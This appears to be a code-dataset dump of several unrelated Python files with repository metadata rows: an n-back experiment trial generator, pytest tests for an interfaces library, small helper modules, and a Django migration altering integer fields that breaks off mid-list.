| 29.109589 | 95 | 0.601882 | 208 | 2,125 | 5.942308 | 0.245192 | 0.101942 | 0.135922 | 0.090615 | 0.883495 | 0.883495 | 0.883495 | 0.883495 | 0.883495 | 0.883495 | 0 | 0 | 0.236235 | 2,125 | 72 | 96 | 29.513889 | 0.761553 | 0.017882 | 0 | 0.461538 | 0 | 0 | 0.447962 | 0.227338 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.092308 | 0.030769 | 0 | 0.030769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
5f557a90d837f7428522749efaadbe5b8f1217e3 | 20,393 | py | Python | src/datastructure/trial_library.py | htwangtw/nbackexpsampling | 510971ca9f784a372548b44d00ba1d4c4a84e0af | [
"MIT"
] | 1 | 2021-02-01T18:54:46.000Z | 2021-02-01T18:54:46.000Z | src/datastructure/trial_library.py | htwangtw/nbackexpsampling | 510971ca9f784a372548b44d00ba1d4c4a84e0af | [
"MIT"
] | 2 | 2020-11-13T10:29:05.000Z | 2021-01-27T06:51:58.000Z | src/datastructure/trial_library.py | htwangtw/nbackexpsampling | 510971ca9f784a372548b44d00ba1d4c4a84e0af | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
'''
trial design
all kind of supporting trial types
this one needs lot of cleaning
'''
from random import choice, shuffle, uniform
from ..fileIO import create_headers
class ExpSample(object):
'''
generate a experience sampling trial detail
trial_spec: dict
trial specification
lst_header: list
headers for generating dictionary to store trial details
'''
def __init__(self, trial_spec, lst_header):
self.trial_spec = trial_spec
self.lst_header = lst_header
def generate_trial(self, stimulus_generator, last_trial):
'''
a generater that creates trials
stimulus_generator: generator
stimulus generator
the output of the generator is a list of dictionaries
the header of the dictionaries are
"Item", "Question", "Scale_low", "Scale_high"
last_trial: dict
the previous trial; some trials need this information
if it's a experience sampling question,
zero-back or no-go trial, None type is accepted
output
dict_rows: a list of dict
a list of trials in dictionary
trial_time: a list of float
total time of each trial, for counter
'''
items = next(stimulus_generator.generate())
dict_rows = []
trial_time = []
for item in items:
dict_row = {key: None for key in self.lst_header}
dict_row['TrialIndex'] = None
dict_row['Condition'] = None
dict_row['TrialType'] = self.trial_spec['trial_type']
dict_row['fix_duration'] = uniform(self.trial_spec['fix_t_min'], self.trial_spec['fix_t_max'])
dict_row['stim_duration'] =self.trial_spec['trial_t_total'] - dict_row['fix_duration']
dict_row['stimPicLeft'] = item['Scale_low']
dict_row['stimPicRight'] = item['Scale_high']
rand_marker_start = round(uniform(1, 10), 1)
dict_row['Ans'] = str(rand_marker_start)
dict_row['stimPicMid'] = item['Item']
dict_rows.append(dict_row)
trial_time.append(self.trial_spec['trial_t_total'])
yield dict_rows, trial_time
class NoGo(object):
'''
generate a one back trial detail
trial_spec: dict
trial specification
lst_header: list
headers for generating dictionary to store trial details
'''
def __init__(self, trial_spec, lst_header):
self.trial_spec = trial_spec
self.lst_header = lst_header
def generate_trial(self, stimulus_generator, last_trial):
'''
a generater that creates trials
stimulus_generator: generator
stimulus generator
last_trial: dict
the previous trial; some trials need this information
if it's a zero-back or no-go trial, None type is accepted
output
dict_row: dict
a trail in dictionary
t: float
total time of this trial, for counter
'''
dict_row = {key: None for key in self.lst_header}
item_list = next(stimulus_generator.generate())
dict_row['TrialIndex'] = None
dict_row['Condition'] = None
dict_row['TrialType'] = self.trial_spec['trial_type']
dict_row['fix_duration'] = uniform(self.trial_spec['fix_t_min'],self.trial_spec['fix_t_max'])
dict_row['stim_duration'] =self.trial_spec['trial_t_total'] - dict_row['fix_duration']
dict_row['stimPicLeft'] = item_list[0]
dict_row['stimPicRight'] = item_list[1]
dict_row['stimPicMid'] = None
dict_row['Ans'] = 'NA'
yield dict_row, self.trial_spec['trial_t_total']
class ZeroBack(object):
'''
generate a zero back trial detail
trial_spec: dict
trial specification
lst_header: list
headers for generating dictionary to store trial details
'''
def __init__(self, trial_spec, lst_header):
self.trial_spec = trial_spec
self.lst_header = lst_header
def generate_trial(self, stimulus_generator, last_trial):
'''
a generater that creates trials
stimulus_generator: generator
stimulus generator
last_trial: dict
the previous trial; some trials need this information
if it's a zero-back or no-go trial, None type is accepted
output
dict_row: dict
a trail in dictionary
self.trial_spec['trial_t_total']: float
total time of this trial, for counter
'''
dict_row = {key: None for key in self.lst_header}
item_list = next(stimulus_generator.generate())
dict_row['TrialIndex'] = None
dict_row['Condition'] = None
dict_row['TrialType'] = self.trial_spec['trial_type']
dict_row['fix_duration'] = uniform(self.trial_spec['fix_t_min'],self.trial_spec['fix_t_max'])
dict_row['stim_duration'] =self.trial_spec['trial_t_total'] - dict_row['fix_duration']
dict_row['stimPicLeft'] = item_list[0]
dict_row['stimPicRight'] = item_list[1]
dict_row['Ans'] = choice(['left', 'right'])
if dict_row['Ans'] == 'left':
dict_row['stimPicMid'] = dict_row['stimPicLeft']
else:
dict_row['stimPicMid'] = dict_row['stimPicRight']
yield dict_row,self.trial_spec['trial_t_total']
class OneBack(object):
'''
generate a one back recall trial detail
trial_spec: dict
trial specification
lst_header: list
headers for generating dictionary to store trial details
'''
def __init__(self, trial_spec, lst_header):
self.trial_spec = trial_spec
self.lst_header = lst_header
def generate_trial(self, last_trial, stimulus_generator):
'''
a generater that creates trials
stimulus_generator: generator
stimulus generator
last_trial: dict
the previous trial; some trials need this information
if it's a zero-back or no-go trial, None type is accepted
output
dict_row: dict
a trail in dictionary
self.trial_spec['trial_t_total']: float
total time of this trial, for counter
'''
dict_row = {key: None for key in self.lst_header}
dict_row['TrialIndex'] = None
dict_row['Condition'] = None
dict_row['TrialType'] = self.trial_spec['trial_type']
dict_row['fix_duration'] = uniform(self.trial_spec['fix_t_min'], self.trial_spec['fix_t_max'])
dict_row['stim_duration'] =self.trial_spec['trial_t_total'] - dict_row['fix_duration']
dict_row['stimPicLeft'] = '?'
dict_row['stimPicRight'] = '?'
dict_row['Ans'] = choice(['left', 'right'])
if dict_row['Ans'] == 'left':
dict_row['stimPicMid'] = last_trial['stimPicLeft']
else:
dict_row['stimPicMid'] = last_trial['stimPicRight']
yield dict_row,self.trial_spec['trial_t_total']
class ZeroBackRecog(object):
'''
generate a zero back trial detail
trial_spec: dict
trial specification
lst_header: list
headers for generating dictionary to store trial details
'''
def __init__(self, trial_spec, lst_header):
self.trial_spec = trial_spec
self.lst_header = lst_header
def generate_trial(self, stimulus_generator, last_trial):
'''
a generater that creates trials
stimulus_generator: generator
stimulus generator
last_trial: dict
the previous trial; some trials need this information
if it's a zero-back or no-go trial, None type is accepted
output
dict_row: dict
a trail in dictionary
self.trial_spec['trial_t_total']: float
total time of this trial, for counter
'''
dict_row = {key: None for key in self.lst_header}
item_list = next(stimulus_generator.generate())
dict_row['TrialIndex'] = None
dict_row['Condition'] = None
dict_row['TrialType'] = self.trial_spec['trial_type']
dict_row['fix_duration'] = uniform(self.trial_spec['fix_t_min'],self.trial_spec['fix_t_max'])
dict_row['stim_duration'] =self.trial_spec['trial_t_total'] - dict_row['fix_duration']
dict_row['stimPicLeft'] = item_list[0]
dict_row['stimPicRight'] = item_list[1]
null = filter(lambda x: x not in item_list, stimulus_generator.stimuli)[0]
dict_row['Ans'] = choice(['yes', 'no'])
if dict_row['Ans'] == 'yes':
dict_row['stimPicMid'] = choice(item_list)
else:
dict_row['stimPicMid'] = null
yield dict_row,self.trial_spec['trial_t_total']
class OneBackRecog(object):
'''
generate a one back recall trial detail
trial_spec: dict
trial specification
lst_header: list
headers for generating dictionary to store trial details
'''
def __init__(self, trial_spec, lst_header):
self.trial_spec = trial_spec
self.lst_header = lst_header
def generate_trial(self, last_trial, stimulus_generator):
'''
a generater that creates trials
stimulus_generator: generator
stimulus generator
last_trial: dict
the previous trial; some trials need this information
if it's a zero-back or no-go trial, None type is accepted
output
dict_row: dict
a trail in dictionary
self.trial_spec['trial_t_total']: float
total time of this trial, for counter
'''
dict_row = {key: None for key in self.lst_header}
# create a equal chance to get a present/absent target in the pre trial
item_list = [last_trial['stimPicLeft'], last_trial['stimPicRight']]
dict_row['TrialType'] = self.trial_spec['trial_type']
dict_row['fix_duration'] = uniform(self.trial_spec['fix_t_min'], self.trial_spec['fix_t_max'])
dict_row['stim_duration'] =self.trial_spec['trial_t_total'] - dict_row['fix_duration']
dict_row['stimPicLeft'] = '?'
dict_row['stimPicRight'] = '?'
null= filter(lambda x: x not in item_list, stimulus_generator.stimuli)[0]
dict_row['Ans'] = choice(['yes', 'no'])
if dict_row['Ans'] == 'yes':
dict_row['stimPicMid'] = choice(item_list)
else:
dict_row['stimPicMid'] = null
yield dict_row,self.trial_spec['trial_t_total']
class Recognition(object):
'''
generate a one back recognition trial detail
trial_spec: dict
trial specification
lst_header: list
headers for generating dictionary to store trial details
'''
def __init__(self, trial_spec, lst_header):
self.trial_spec = trial_spec
self.lst_header = lst_header
def generate_trial(self, last_trial, stimulus_generator):
'''
a generater that creates trials
stimulus_generator: generator
stimulus generator
last_trial: dict
the previous trial; some trials need this information
if it's a zero-back or no-go trial, None type is accepted
output
dict_row: dict
a trail in dictionary
self.trial_spec['trial_t_total']: float
total time of this trial, for counter
'''
dict_row = {key: None for key in self.lst_header}
dict_row['TrialIndex'] = None
dict_row['Condition'] = None
dict_row['TrialType'] = self.trial_spec['trial_type']
dict_row['fix_duration'] = uniform(self.trial_spec['fix_t_min'], self.trial_spec['fix_t_max'])
dict_row['stim_duration'] =self.trial_spec['trial_t_total'] - dict_row['fix_duration']
# decide to preserve left or right
for f1 in stimulus_generator.feature1:
if f1 not in [last_trial['stimPicLeft'][0], last_trial['stimPicRight'][0]]:
distract_feature1 = f1
for f2 in stimulus_generator.feature2:
if f2 not in [last_trial['stimPicLeft'][1], last_trial['stimPicRight'][1]]:
distract_feature2 = f2
distractor = (distract_feature1, distract_feature2)
if choice(['left', 'right']) == 'left':
dict_row['stimPicLeft'] = last_trial['stimPicLeft']
dict_row['stimPicRight'] = distractor
dict_row['stimPicMid'] = '?'
dict_row['Ans'] = 'yes'
else:
dict_row['stimPicLeft'] = distractor
dict_row['stimPicRight'] = last_trial['stimPicRight']
dict_row['stimPicMid'] = '?'
dict_row['Ans'] = 'no'
yield dict_row,self.trial_spec['trial_t_total']
class ZeroBack_feature(object):
'''
generate a zero back trial detail
trial_spec: dict
trial specification
lst_header: list
headers for generating dictionary to store trial details
'''
def __init__(self, trial_spec, lst_header):
self.trial_spec = trial_spec
self.lst_header = lst_header
def generate_trial(self, stimulus_generator, last_trial):
'''
a generater that creates trials
stimulus_generator: generator
stimulus generator
last_trial: dict
the previous trial; some trials need this information
if it's a zero-back or no-go trial, None type is accepted
output
dict_row: dict
a trail in dictionary
self.trial_spec['trial_t_total']: float
total time of this trial, for counter
'''
dict_row = {key: None for key in self.lst_header}
item_list = next(stimulus_generator.generate())
dict_row['TrialIndex'] = None
dict_row['Condition'] = None
dict_row['TrialType'] = self.trial_spec['trial_type']
dict_row['fix_duration'] = uniform(self.trial_spec['fix_t_min'], self.trial_spec['fix_t_max'])
dict_row['stim_duration'] =self.trial_spec['trial_t_total'] - dict_row['fix_duration']
dict_row['stimPicLeft'] = item_list[0]
dict_row['stimPicRight'] = item_list[1]
target_item = choice(item_list)
target_feat = choice(target_item)
# decide to preserve left or right
# they all the items on screen can only share on feature
if target_feat in stimulus_generator.feature1:
for f2 in stimulus_generator.feature2:
if f2 not in [dict_row['stimPicLeft'][1], dict_row['stimPicRight'][1]]:
distract_feature2 = f2
dict_row['stimPicMid'] = (target_feat, distract_feature2)
else:
for f1 in stimulus_generator.feature1:
if f1 not in [dict_row['stimPicLeft'][0], dict_row['stimPicRight'][0]]:
distract_feature1 = f1
dict_row['stimPicMid'] = (distract_feature1, target_feat)
if dict_row['stimPicLeft'] == target_item:
dict_row['Ans'] = 'left'
else:
dict_row['Ans'] = 'right'
yield dict_row,self.trial_spec['trial_t_total']
class OneBack_feature(object):
'''
generate a one back trial detail
trial_spec: dict
trial specification
lst_header: list
headers for generating dictionary to store trial details
'''
def __init__(self, trial_spec, lst_header):
self.trial_spec = trial_spec
self.lst_header = lst_header
def generate_trial(self, last_trial, stimulus_generator):
'''
a generater that creates trials
stimulus_generator: generator
stimulus generator
last_trial: dict
the previous trial; some trials need this information
if it's a zero-back or no-go trial, None type is accepted
output
dict_row: dict
a trail in dictionary
self.trial_spec['trial_t_total']: float
total time of this trial, for counter
'''
dict_row = {key: None for key in self.lst_header}
dict_row['TrialIndex'] = None
dict_row['Condition'] = None
dict_row['TrialType'] = self.trial_spec['trial_type']
dict_row['fix_duration'] = uniform(self.trial_spec['fix_t_min'], self.trial_spec['fix_t_max'])
dict_row['stim_duration'] =self.trial_spec['trial_t_total'] - dict_row['fix_duration']
dict_row['stimPicLeft'] = '?'
dict_row['stimPicRight'] = '?'
target_item = choice([last_trial['stimPicLeft'], last_trial['stimPicRight']])
target_feat = choice(target_item)
# decide to preserve left or right
if target_feat in stimulus_generator.feature1:
for f2 in stimulus_generator.feature2:
if f2 not in [last_trial['stimPicLeft'][1], last_trial['stimPicRight'][1]]:
distract_feature2 = f2
dict_row['stimPicMid'] = (target_feat, distract_feature2)
else:
for f1 in stimulus_generator.feature1:
if f1 not in [last_trial['stimPicLeft'][0], last_trial['stimPicRight'][0]]:
distract_feature1 = f1
dict_row['stimPicMid'] = (distract_feature1, target_feat)
if last_trial['stimPicLeft'] == target_item:
dict_row['Ans'] = 'left'
else:
dict_row['Ans'] = 'right'
yield dict_row,self.trial_spec['trial_t_total']
class Recognition_feature(object):
'''
generate a one back trial detail
trial_spec: dict
trial specification
lst_header: list
headers for generating dictionary to store trial details
'''
def __init__(self, trial_spec, lst_header):
self.trial_spec = trial_spec
self.lst_header = lst_header
def generate_trial(self, last_trial, stimulus_generator):
'''
a generater that creates trials
stimulus_generator: generator
stimulus generator
last_trial: dict
the previous trial; some trials need this information
if it's a zero-back or no-go trial, None type is accepted
output
dict_row: dict
a trail in dictionary
self.trial_spec['trial_t_total']: float
total time of this trial, for counter
'''
dict_row = {key: None for key in self.lst_header}
dict_row['TrialIndex'] = None
dict_row['Condition'] = None
dict_row['TrialType'] = self.trial_spec['trial_type']
dict_row['fix_duration'] = uniform(self.trial_spec['fix_t_min'], self.trial_spec['fix_t_max'])
dict_row['stim_duration'] =self.trial_spec['trial_t_total'] - dict_row['fix_duration']
# decide to preserve left or right
for f1 in stimulus_generator.feature1:
if f1 not in [last_trial['stimPicLeft'][0], last_trial['stimPicRight'][0]]:
distract_feature1 = f1
for f2 in stimulus_generator.feature2:
if f2 not in [last_trial['stimPicLeft'][1], last_trial['stimPicRight'][1]]:
distract_feature2 = f2
distractor = (distract_feature1, distract_feature2)
if choice(['left', 'right']) == 'left':
target_item = last_trial['stimPicLeft']
target_feat = choice(target_item)
if target_feat in stimulus_generator.feature1:
dict_row['stimPicLeft'] = (target_feat, last_trial['stimPicRight'][1])
else:
dict_row['stimPicLeft'] = (last_trial['stimPicRight'][0], target_feat)
dict_row['stimPicRight'] = distractor
dict_row['stimPicMid'] = '?'
dict_row['Ans'] = 'left'
else:
target_item = last_trial['stimPicRight']
target_feat = choice(target_item)
if target_feat in stimulus_generator.feature1:
dict_row['stimPicRight'] = (target_feat, last_trial['stimPicLeft'][1])
else:
dict_row['stimPicRight'] = (last_trial['stimPicLeft'][0], target_feat)
dict_row['stimPicLeft'] = distractor
dict_row['stimPicMid'] = '?'
dict_row['Ans'] = 'right'
yield dict_row,self.trial_spec['trial_t_total']
| 31.422188 | 106 | 0.620654 | 2,524 | 20,393 | 4.754754 | 0.06141 | 0.090992 | 0.084493 | 0.071994 | 0.912007 | 0.884343 | 0.870594 | 0.868344 | 0.864845 | 0.864845 | 0 | 0.005947 | 0.282597 | 20,393 | 648 | 107 | 31.470679 | 0.814354 | 0.277791 | 0 | 0.812 | 0 | 0 | 0.167267 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08 | false | 0 | 0.008 | 0 | 0.128 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5f9fdfacbd96beeed83f9218ef6e77b30db9a2d5 | 4,699 | py | Python | tests/util_test.py | lig/python-interfaces | cf8c5419a827ed74732b938db82e293ea7c9f43f | [
"MIT"
] | 15 | 2019-04-29T05:35:04.000Z | 2021-07-17T01:35:19.000Z | tests/util_test.py | lig/python-interfaces | cf8c5419a827ed74732b938db82e293ea7c9f43f | [
"MIT"
] | 2 | 2019-05-04T20:51:46.000Z | 2019-05-06T07:09:32.000Z | tests/util_test.py | lig/python-interfaces | cf8c5419a827ed74732b938db82e293ea7c9f43f | [
"MIT"
] | 1 | 2020-12-04T07:37:45.000Z | 2020-12-04T07:37:45.000Z | import pytest
import interfaces
@pytest.fixture(scope='session', params=[interfaces.isimplementation, issubclass])
def isimplementation(request):
return request.param
def test_010_isimplementation_single_true_explicit_interface(
typeT1, typeT2, isimplementation
):
class TestInterface(interfaces.interface):
def method(arg: typeT1) -> typeT2:
pass
class TestClass(interfaces.object, implements=[TestInterface]):
def method(arg: typeT1) -> typeT2:
pass
assert isimplementation(TestClass, TestInterface)
def test_020_isimplementation_single_true_explicit_object(
typeT1, typeT2, isimplementation
):
class TestInterface(interfaces.interface):
def method(arg: typeT1) -> typeT2:
pass
class TestClass(interfaces.object):
def method(arg: typeT1) -> typeT2:
pass
assert isimplementation(TestClass, TestInterface)
def test_030_isimplementation_single_true(typeT1, typeT2, isimplementation):
class TestInterface(interfaces.interface):
def method(arg: typeT1) -> typeT2:
pass
class TestClass:
def method(arg: typeT1) -> typeT2:
pass
assert isimplementation(TestClass, TestInterface)
def test_040_isimplementation_single_false(typeT1, typeT2, isimplementation):
class TestInterface(interfaces.interface):
def method(arg: typeT1) -> typeT2:
pass
class TestClass:
pass
assert not isimplementation(TestClass, TestInterface)
def test_050_isimplementation_multi_true_one_explicit(typeT1, typeT2, isimplementation):
class TestInterfaceA(interfaces.interface):
def method_a(arg: typeT1) -> typeT1:
pass
class TestInterfaceB(interfaces.interface):
def method_b(arg: typeT2) -> typeT2:
pass
class TestClass(interfaces.object, implements=[TestInterfaceA, TestInterfaceB]):
def method_a(arg: typeT1) -> typeT1:
pass
def method_b(arg: typeT2) -> typeT2:
pass
assert isimplementation(TestClass, TestInterfaceA)
def test_060_isimplementation_multi_true_one(typeT1, typeT2, isimplementation):
class TestInterfaceA(interfaces.interface):
def method_a(arg: typeT1) -> typeT1:
pass
class TestInterfaceB(interfaces.interface):
def method_b(arg: typeT2) -> typeT2:
pass
class TestClass:
def method_a(arg: typeT1) -> typeT1:
pass
def method_b(arg: typeT2) -> typeT2:
pass
assert isimplementation(TestClass, TestInterfaceA)
def test_070_isimplementation_multi_true_all_explicit(typeT1, typeT2, isimplementation):
class TestInterfaceA(interfaces.interface):
def method_a(arg: typeT1) -> typeT1:
pass
class TestInterfaceB(interfaces.interface):
def method_b(arg: typeT2) -> typeT2:
pass
class TestClass(interfaces.object, implements=[TestInterfaceA, TestInterfaceB]):
def method_a(arg: typeT1) -> typeT1:
pass
def method_b(arg: typeT2) -> typeT2:
pass
assert isimplementation(TestClass, (TestInterfaceA, TestInterfaceB))
def test_080_isimplementation_multi_true_all(typeT1, typeT2, isimplementation):
class TestInterfaceA(interfaces.interface):
def method_a(arg: typeT1) -> typeT1:
pass
class TestInterfaceB(interfaces.interface):
def method_b(arg: typeT2) -> typeT2:
pass
class TestClass:
def method_a(arg: typeT1) -> typeT1:
pass
def method_b(arg: typeT2) -> typeT2:
pass
assert isimplementation(TestClass, (TestInterfaceA, TestInterfaceB))
def test_090_isimplementation_multi_false_one(typeT1, typeT2):
class TestInterfaceA(interfaces.interface):
def method_a(arg: typeT1) -> typeT1:
pass
class TestInterfaceB(interfaces.interface):
def method_b(arg: typeT2) -> typeT2:
pass
class TestClass:
def method_a(arg: typeT1) -> typeT1:
pass
# NOTE: In this case `isimplementation` behaves different than `issubclass`
assert not interfaces.isimplementation(TestClass, (TestInterfaceA, TestInterfaceB))
def test_100_isimplementation_multi_false_all(typeT1, typeT2, isimplementation):
class TestInterfaceA(interfaces.interface):
def method_a(arg: typeT1) -> typeT1:
pass
class TestInterfaceB(interfaces.interface):
def method_b(arg: typeT2) -> typeT2:
pass
class TestClass:
pass
assert not isimplementation(TestClass, (TestInterfaceA, TestInterfaceB))
| 27.970238 | 88 | 0.680783 | 467 | 4,699 | 6.69379 | 0.117773 | 0.080614 | 0.112604 | 0.143314 | 0.805502 | 0.799104 | 0.77991 | 0.776711 | 0.776711 | 0.752399 | 0 | 0.029592 | 0.23771 | 4,699 | 167 | 89 | 28.137725 | 0.843104 | 0.015535 | 0 | 0.823009 | 0 | 0 | 0.001514 | 0 | 0 | 0 | 0 | 0 | 0.088496 | 1 | 0.345133 | false | 0.265487 | 0.017699 | 0.00885 | 0.60177 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
396fa82d44b683089213c89d99af22408c5d1e95 | 57 | py | Python | pontoon/test/fixtures/__init__.py | udacity/pontoon | e15a03a0c987615385b2a8c537bb18c99567f77e | [
"BSD-3-Clause"
] | 1 | 2018-12-24T11:15:35.000Z | 2018-12-24T11:15:35.000Z | pontoon/test/fixtures/__init__.py | udacity/pontoon | e15a03a0c987615385b2a8c537bb18c99567f77e | [
"BSD-3-Clause"
] | 9 | 2020-09-06T05:18:03.000Z | 2022-02-26T14:28:38.000Z | pontoon/test/fixtures/__init__.py | udacity/pontoon | e15a03a0c987615385b2a8c537bb18c99567f77e | [
"BSD-3-Clause"
] | 1 | 2019-05-25T23:24:42.000Z | 2019-05-25T23:24:42.000Z | from asserts import * # noqa
from base import * # noqa
| 19 | 29 | 0.684211 | 8 | 57 | 4.875 | 0.625 | 0.512821 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.245614 | 57 | 2 | 30 | 28.5 | 0.906977 | 0.157895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
39784ace7eedad0c2ba8151b1b12257bdc2a921b | 80 | py | Python | djangoproj/djangoapp/csc/nl/hu/__init__.py | pbarton666/buzz_bot | 9f44c66e8ecb10e231f70989421f164d7a55029a | [
"MIT"
] | null | null | null | djangoproj/djangoapp/csc/nl/hu/__init__.py | pbarton666/buzz_bot | 9f44c66e8ecb10e231f70989421f164d7a55029a | [
"MIT"
] | null | null | null | djangoproj/djangoapp/csc/nl/hu/__init__.py | pbarton666/buzz_bot | 9f44c66e8ecb10e231f70989421f164d7a55029a | [
"MIT"
] | null | null | null | from csc.nl.euro import StemmedEuroNL
def NL():
return StemmedEuroNL('hu')
| 16 | 37 | 0.725 | 11 | 80 | 5.272727 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1625 | 80 | 4 | 38 | 20 | 0.865672 | 0 | 0 | 0 | 0 | 0 | 0.025 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
845f94a3308da1191f39e97391aaaf86c18b5210 | 126 | py | Python | pype/modules/avalon_apps/__init__.py | kalisp/pype | 28bbffaf2d12ccee48313cd9985e8dfa05e81a5c | [
"MIT"
] | null | null | null | pype/modules/avalon_apps/__init__.py | kalisp/pype | 28bbffaf2d12ccee48313cd9985e8dfa05e81a5c | [
"MIT"
] | null | null | null | pype/modules/avalon_apps/__init__.py | kalisp/pype | 28bbffaf2d12ccee48313cd9985e8dfa05e81a5c | [
"MIT"
] | null | null | null | from .avalon_app import AvalonApps
def tray_init(tray_widget, main_widget):
return AvalonApps(main_widget, tray_widget)
| 21 | 47 | 0.809524 | 18 | 126 | 5.333333 | 0.611111 | 0.208333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126984 | 126 | 5 | 48 | 25.2 | 0.872727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
0827006b95f963f339531de4a50b661d34941094 | 101 | py | Python | MHDpy/measure/topology.py | WenyinWei/MHDpy | a1ba3cd4b1ca8287e32a97170c685dff1d7cd276 | [
"MIT"
] | null | null | null | MHDpy/measure/topology.py | WenyinWei/MHDpy | a1ba3cd4b1ca8287e32a97170c685dff1d7cd276 | [
"MIT"
] | null | null | null | MHDpy/measure/topology.py | WenyinWei/MHDpy | a1ba3cd4b1ca8287e32a97170c685dff1d7cd276 | [
"MIT"
] | 1 | 2021-05-27T14:13:48.000Z | 2021-05-27T14:13:48.000Z | import numpy as _np
def B_axis_circle_length(B_axis_radius:float):
return 2*_np.pi*B_axis_radius | 25.25 | 46 | 0.811881 | 20 | 101 | 3.65 | 0.7 | 0.205479 | 0.30137 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011236 | 0.118812 | 101 | 4 | 47 | 25.25 | 0.808989 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
08322847c8c6346d16ac7e48480208f14ce16b3d | 3,406 | py | Python | backend/uclapi/timetable/migrations/0010_auto_20190220_1835.py | balping/uclapi | 57cb77a58a2f8fc5bb523b459fa074380f4d8dcc | [
"MIT"
] | null | null | null | backend/uclapi/timetable/migrations/0010_auto_20190220_1835.py | balping/uclapi | 57cb77a58a2f8fc5bb523b459fa074380f4d8dcc | [
"MIT"
] | null | null | null | backend/uclapi/timetable/migrations/0010_auto_20190220_1835.py | balping/uclapi | 57cb77a58a2f8fc5bb523b459fa074380f4d8dcc | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.18 on 2019-02-20 18:35
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('timetable', '0009_coursea_courseb'),
]
operations = [
migrations.AlterField(
model_name='modulegroupsa',
name='csize',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsa',
name='estsize',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsa',
name='groupnum',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsa',
name='maxsize',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsa',
name='mequivid',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsa',
name='minsize',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsa',
name='parentkey',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsa',
name='prefmaxsize',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsa',
name='thiskey',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsb',
name='csize',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsb',
name='estsize',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsb',
name='groupnum',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsb',
name='maxsize',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsb',
name='mequivid',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsb',
name='minsize',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='modulegroupsb',
name='parentkey',
field=models.IntegerField(blank=True, null=True),
),
